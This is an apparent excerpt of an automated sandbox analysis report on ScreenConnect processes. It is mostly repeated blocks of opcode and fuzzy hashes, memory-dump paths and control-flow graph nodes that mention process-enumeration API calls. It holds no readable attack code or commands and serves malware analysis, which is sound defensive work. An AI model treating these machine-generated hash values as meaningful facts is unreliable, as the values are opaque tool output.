                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1dd5c0e822a421e3b157bd7ffe5d31fc9a66eea124804169864a1edf50c85837
                                                                                                                                                                                                                                                                          • Instruction ID: 938b5e7a1c065a41058d74874385ea292f2aa48f2972935088bf0820f7aa8f32
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dd5c0e822a421e3b157bd7ffe5d31fc9a66eea124804169864a1edf50c85837
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF08237B1C2045FD719CABEA400A9BBBDDCBC4220B14C47FD54DC3740E931A4008764
                                                                                                                                                                                                                                                                          Function 02488158 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d58a165a45cada773e94b85b3404fbc3b64c29474453836e798753ce41d89881
                                                                                                                                                                                                                                                                          • Instruction ID: 45e9e370aab904dd714a34fe99f631cb0bfeda5f38676021ceeeebfdd297f454
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d58a165a45cada773e94b85b3404fbc3b64c29474453836e798753ce41d89881
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5F0A77691D2846FC716C7B95C50ADB7FED8EC5110704C0BFD04DC3252D8645402CB35
                                                                                                                                                                                                                                                                          Function 02481414 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e78e6c7f9c6605e1e7c87f5175b7fdbee8cbed7ead7a40662d2fbe191cf795ac
                                                                                                                                                                                                                                                                          • Instruction ID: 7e4296846a179f28cf904aaa2fbd2dcea1043b85058c970ca902365449bdab16
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e78e6c7f9c6605e1e7c87f5175b7fdbee8cbed7ead7a40662d2fbe191cf795ac
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F0F66200C2D14FD317D778B8216993FE4DD9221074849DBD085CB167D68CA50BC351
                                                                                                                                                                                                                                                                          Function 02488100 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: aa5b1b6c1b813df13d3fae3f07a2afdc8e788c1f1046b5bb69dadfd804158729
                                                                                                                                                                                                                                                                          • Instruction ID: d5dcdff6e12feee49812bcfc4d4a1bae5ebde4822282e76ad6e1463c6433ccb0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa5b1b6c1b813df13d3fae3f07a2afdc8e788c1f1046b5bb69dadfd804158729
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF02BA009C3D64FC3138BB46CA85C57FE89D071347490ADDD4D08F0A3C66C4497D352
                                                                                                                                                                                                                                                                          Function 02486EF2 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 2d1e12d2c7be9c78a9dbefa5b0a50d81e2bea7361b230def1a71c5931398d205
                                                                                                                                                                                                                                                                          • Instruction ID: 86da12ddb98d9f36f46c16f9c81b146143b122ed45019f0edaf2a6bebb3845e3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d1e12d2c7be9c78a9dbefa5b0a50d81e2bea7361b230def1a71c5931398d205
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28E06D313043905B87155BAE689866E7BDAEBC9626714813EF50AC3351DE664C078761
                                                                                                                                                                                                                                                                          Function 02485F68 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ff1c38a70175872bf2501c6c955a6519d638f79985bbbf06ff5886c6f84041b5
                                                                                                                                                                                                                                                                          • Instruction ID: 80e13eb4078bd4ca5e7b077b11b06a166cfedab658b560303c5887105bcfbfff
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff1c38a70175872bf2501c6c955a6519d638f79985bbbf06ff5886c6f84041b5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9F0E572B256808FCB02A76859901696BDACF8926D76E85B7F556CF391E324CC428341
                                                                                                                                                                                                                                                                          Function 02481DA1 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1db77a435cd01714d7f4e0e413bdbb12870e2ea7593883dc23b9c91843122798
                                                                                                                                                                                                                                                                          • Instruction ID: 4e6731ce8673dbf67abb317cbfaf38046cfc8b0a806ddbe92d41c81599e1b3e1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1db77a435cd01714d7f4e0e413bdbb12870e2ea7593883dc23b9c91843122798
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31F0E5753082905FC3065778AC584AD3FA5DECA222314866FE48AC73A1CE748C07C761
                                                                                                                                                                                                                                                                          Function 024812B0 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 0dde5e5f6663a7bbcdee46af4e3a4b0289adca31e47d9b7fcf3844c54e754222
                                                                                                                                                                                                                                                                          • Instruction ID: 05c1796cb586773856bd2f741f07b608212951a4c7ed9bcdc65c4370b6a45a87
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dde5e5f6663a7bbcdee46af4e3a4b0289adca31e47d9b7fcf3844c54e754222
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EF0A03A3106049B831AB66DE800E9F37E9CFC4610300802ED41ACB364EF21EC0A9B81
                                                                                                                                                                                                                                                                          Function 02486EF8 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ae39e9d156fa481f27a303d9c470178dc0692349168bb58371e14907e2c69f68
                                                                                                                                                                                                                                                                          • Instruction ID: ca5565194d04fb971642707c6e2a5ffa881d10b741e67a9bd89e36f264fe1bbb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae39e9d156fa481f27a303d9c470178dc0692349168bb58371e14907e2c69f68
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BE04F323043546797146BAEA88862FBADBEBC9662754843EF60EC3341DE759C0643A5
                                                                                                                                                                                                                                                                          Function 0248181A Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e32393fbadbe1c282bf7cc9faff77be28a60f0721d78eff14d894b2c2dbf1d53
                                                                                                                                                                                                                                                                          • Instruction ID: 0599fd3bd691216adca81a3c6a074b2ed55196d0a764b79c4375cdf8efe72375
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e32393fbadbe1c282bf7cc9faff77be28a60f0721d78eff14d894b2c2dbf1d53
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11E092346592908FC7056BB0995C89D7FF6EF4622130940AAD84A8B232CB398C03CB41
                                                                                                                                                                                                                                                                          Function 02480838 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7314b0bd95d36b0c3e3a22b5c93e251f0288d8f46bcb0fc5a21b369bfdd72a59
                                                                                                                                                                                                                                                                          • Instruction ID: dd3c6b304bd66fa68027b73844d4c2d3736d9f2cdb5df0e727ad4e30340dd539
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7314b0bd95d36b0c3e3a22b5c93e251f0288d8f46bcb0fc5a21b369bfdd72a59
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BE06D30549384AFCB02DBB4EC51A9E7FF5AE42300B0682EED448DB222CA354E069B11
                                                                                                                                                                                                                                                                          Function 02481DF8 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5c8f13d28ab5803a8d36fdd4ae3978462d34467c96a6bcb81f87634314cca2f0
                                                                                                                                                                                                                                                                          • Instruction ID: f9ab3a8a075d04775418ddc6404f1a6fecc2e2002e114a1192aeb64c29ba4446
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c8f13d28ab5803a8d36fdd4ae3978462d34467c96a6bcb81f87634314cca2f0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4E068705492889FC705DFB4ED409ED7FB8CE0220430080DAE408D7122D6345F0ADB01
                                                                                                                                                                                                                                                                          Function 02481310 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 99eed2677a3379a0556e3e8f5a8b58f7d1e061021c4f994812f1767bcbd98985
                                                                                                                                                                                                                                                                          • Instruction ID: 1e244ed328cedb8dad1d80bfd45d0c120dc4df26c9af73db31ce1cba311ef2a2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99eed2677a3379a0556e3e8f5a8b58f7d1e061021c4f994812f1767bcbd98985
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDE01AB0C59149AFCB80DFB88D9159EBFF4AE49110B1482EAC84EE7252D67685438B91
                                                                                                                                                                                                                                                                          Function 024813D1 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 4909179d67fcd60e57e3bd37bb0a0ac3b3bb3077e6f6b590172139a88b4888dd
                                                                                                                                                                                                                                                                          • Instruction ID: 84c205b664d593ae25c6f2f7291336abcb066010f2a10cb9ac97163897115b99
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4909179d67fcd60e57e3bd37bb0a0ac3b3bb3077e6f6b590172139a88b4888dd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E0922114C6D10FC316DB78B850ADD7FE59EC2224B084AE9E0819B167D698A94A83A5
                                                                                                                                                                                                                                                                          Function 02481DB0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: b08d726abd8d66ee41fcbcc22f70f8de4e78fd5e47082cf80e2059910d03a856
                                                                                                                                                                                                                                                                          • Instruction ID: 2f40281c2ff63b483fe9e2b57830686544d378337b4861f81faf8607f125081a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b08d726abd8d66ee41fcbcc22f70f8de4e78fd5e47082cf80e2059910d03a856
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBE08C7A3142149B82046B7DE84945E7BAAEBC92623208526F95AC73A4DF709C0397A1
                                                                                                                                                                                                                                                                          Function 02487FB8 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 75529531225655d2de6aac20928af9d37db7a011cd984f4714b3478b6c2c7bee
                                                                                                                                                                                                                                                                          • Instruction ID: bdd3421b5c134c05982a4f4147b9e832cd46b549ec9826d995f310a495bdf868
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75529531225655d2de6aac20928af9d37db7a011cd984f4714b3478b6c2c7bee
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFE01A3051A7419FC341DF24DD0AA46BBF0AB05702F0AC89EE88DCB292D334D94ACF92
                                                                                                                                                                                                                                                                          Function 02480848 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: eba115d7340c5bcc77d95e9478ae5f093ae35bfcae9c0408424f6338810b3dbb
                                                                                                                                                                                                                                                                          • Instruction ID: 43aa60e80237ae3a3ce128499017d32be4aeb2ec5dabd9e36998c36200444ca3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eba115d7340c5bcc77d95e9478ae5f093ae35bfcae9c0408424f6338810b3dbb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36D01730A15208EF8B04EFB8E94199EBBF9EB45304B1081ADD408D7221EA316F06AB81
                                                                                                                                                                                                                                                                          Function 02481E08 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3fe0c0a16b84656470996903158ae80da81378512724edc8f40ba45e27d6dd36
                                                                                                                                                                                                                                                                          • Instruction ID: 728e60cf3be18fd2e79be2262a41df1fcb4b9af20d8a80d5905a4f836f97e480
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fe0c0a16b84656470996903158ae80da81378512724edc8f40ba45e27d6dd36
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96D05E74A0520CEFDB44EFB8ED01A5DB7B9EB44209B1085A9E908E3314EB31AF049B81

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:11%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                          Total number of Nodes:45
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:7
                                                                                                                                                                                                                                                                          execution_graph 17804 5554408 17806 555443c 17804->17806 17807 555442c 17804->17807 17805 5554435 17814 5554521 17806->17814 17822 5554578 17806->17822 17829 5554588 17806->17829 17807->17805 17811 5554521 4 API calls 17807->17811 17812 5554578 4 API calls 17807->17812 17813 5554588 4 API calls 17807->17813 17811->17807 17812->17807 17813->17807 17816 555452a 17814->17816 17817 555457e 17814->17817 17815 55545ad 17819 55545b6 17815->17819 17850 55527c0 17815->17850 17816->17807 17817->17815 17836 55546f9 17817->17836 17843 5554708 17817->17843 17819->17807 17823 5554588 17822->17823 17824 55545ad 17823->17824 17827 55546f9 2 API calls 17823->17827 17828 5554708 2 API calls 17823->17828 17825 55545b6 17824->17825 17826 55527c0 ProcessIdToSessionId 17824->17826 17825->17807 17826->17824 17827->17824 17828->17824 17831 55545ad 17829->17831 17832 55545bd 17829->17832 17830 55545b6 17830->17807 17831->17830 17833 55527c0 ProcessIdToSessionId 17831->17833 17834 55546f9 2 API calls 17832->17834 17835 5554708 2 API calls 17832->17835 17833->17831 17834->17831 17835->17831 17840 5554708 17836->17840 17837 555471f 17838 5554728 17837->17838 17839 555489a K32EnumProcesses 17837->17839 17838->17815 17841 55548d2 17839->17841 17840->17837 17853 55527cc 17840->17853 17841->17815 17848 5554732 17843->17848 17849 555471f 17843->17849 17844 5554728 17844->17815 17845 555489a K32EnumProcesses 17846 55548d2 17845->17846 17846->17815 17847 55527cc K32EnumProcesses 17847->17848 17848->17847 17848->17849 17849->17844 17849->17845 17851 5554940 ProcessIdToSessionId 17850->17851 17852 55549b3 17851->17852 17852->17815 17854 5554848 K32EnumProcesses 17853->17854 17856 55548d2 17854->17856 17856->17840

                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                          Function 00BAC67F Relevance: 2.8, Strings: 2, Instructions: 274COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 0 bac67f-bac683 1 bac686-bac69b 0->1 2 bac6e4 0->2 4 bac69e-bac6b1 1->4 5 bac6fc-bac713 1->5 9 bac6f2-bac6fb 4->9 10 bac6b3 4->10 8 bac714-bac726 5->8 11 bac72c-bac744 8->11 12 baca57-baca5e 8->12 9->5 10->8 13 bac6b6-bac6df 10->13 18 bac766-bac781 11->18 19 bac746-bac761 11->19 13->2 75 bac786 call bacbb0 18->75 76 bac786 call bacbc0 18->76 24 bac80e-bac823 call baf950 19->24 28 baca2b-baca3e 24->28 29 bac829-bac83f call ba5c2c 24->29 25 bac78c-bac7d7 call baed38 39 bac7da-bac800 25->39 30 baca45-baca49 28->30 36 bac841-bac847 29->36 37 bac857-bac880 29->37 34 baca4b 30->34 35 baca54-baca55 30->35 34->35 35->12 40 bac84b-bac84d 36->40 41 bac849 36->41 37->28 46 bac886-bac88c 37->46 47 bac80b 39->47 48 bac802 39->48 40->37 41->37 49 bac892-bac8a9 46->49 50 baca40 46->50 47->24 48->47 49->50 52 bac8af-bac8d3 49->52 50->30 55 bac8d9-bac972 call baaab0 call bab5a8 52->55 56 baca1e-baca25 52->56 55->28 63 bac978-bac986 55->63 56->28 56->46 65 bac988-bac9ac 63->65 66 bac9b1-bac9f1 call bafa08 63->66 65->30 72 bac9fa-baca1c call ba5c3c 66->72 72->30 75->25 76->25
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: $jq$$jq
                                                                                                                                                                                                                                                                          • API String ID: 0-3720491408
                                                                                                                                                                                                                                                                          • Opcode ID: b15781b29927daffbc8af47c32f5ae1a43a29b88c8f386f4c23a716c0fcd607a
                                                                                                                                                                                                                                                                          • Instruction ID: f077d7841bfb314c10ad7da8ae2b83b1a4e690f9a11b2af3657a7df456194d5f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b15781b29927daffbc8af47c32f5ae1a43a29b88c8f386f4c23a716c0fcd607a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACB18030E04749CFCB05EFA8C594AAEBBF1FF46300F1085A9D515AB2A5DB749D89CB80
                                                                                                                                                                                                                                                                          Function 00BAEF78 Relevance: 2.7, Strings: 2, Instructions: 202COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 131 baef78-baef97 132 baf1c8-baf1ed 131->132 133 baef9d-baefa6 131->133 137 baf1f4-baf233 132->137 136 baefac-baf010 133->136 133->137 148 baf03a-baf043 136->148 149 baf012-baf037 136->149 150 baf048-baf05e call baf640 148->150 151 baf045 148->151 149->148 154 baf064-baf066 150->154 151->150 156 baf068-baf06d 154->156 157 baf0c3-baf0d0 154->157 158 baf0a9-baf0bc 156->158 159 baf06f-baf0a4 156->159 163 baf0dd 157->163 164 baf0d2-baf0db 157->164 158->157 170 baf168-baf17c 159->170 165 baf0e2-baf0e4 163->165 164->165 166 baf119-baf161 165->166 167 baf0e6-baf112 165->167 166->170 167->166 175 baf17e 170->175 176 baf186-baf18b 170->176 175->176 178 baf18d 176->178 179 baf195-baf19a 176->179 178->179 181 baf1af 179->181 182 baf19c-baf1aa call bae9f4 call baea0c 179->182 181->132 182->181
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (&jq$(nq
                                                                                                                                                                                                                                                                          • API String ID: 0-2454636555
                                                                                                                                                                                                                                                                          • Opcode ID: c9010ff0b5931c1a00bfced98e918f35afcbac338babfb8ea11cf68c210df7e9
